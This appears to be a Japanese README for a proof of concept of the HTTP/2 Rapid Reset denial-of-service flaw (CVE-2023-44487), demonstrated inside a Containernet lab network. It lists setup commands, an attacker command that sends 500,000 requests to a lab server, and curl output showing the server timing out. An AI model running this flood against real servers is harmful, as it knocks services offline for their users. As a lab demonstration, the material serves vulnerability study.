
HTTP/2 Rapid Reset DDoS脆弱性(CVE-2023-44487)のPoC
このプロジェクトは、Containernetで作成したカスタムネットワークトポロジを使用して、HTTP/2 Rapid Resetサービス拒否(DoS)攻撃を実演します。この攻撃はHTTP/2プロトコルの脆弱性を悪用し、対象サーバーに過負荷をかけて応答不能にします。

必要なパッケージをインストールするには、次のコマンドを実行します。
./install.sh
デフォルトのインストールディレクトリを変更するには、INSTALL_DIR変数を次のように変更できます。
INSTALL_DIR=/custom/path ./install.sh
インフラストラクチャを起動するには、次のコマンドを実行します。
source ~/.containernet/containernet/venv/bin/activate
sudo -E env PATH=$PATH ./topo.py
攻撃を開始するには、攻撃者コンテナ内で次のコマンドを実行します。
./attacker -url='https://modern.art:443/api' -requests=500000
しばらくすると、curlを使用してWebサイトにアクセスしようとすると、応答しなくなります。
root@attacker:/attacker# curl -k https://modern.art/
curl: (28) SSL connection timeout
インフラストラクチャを停止するには、topo.pyが実行されているターミナルでexitと入力するだけです。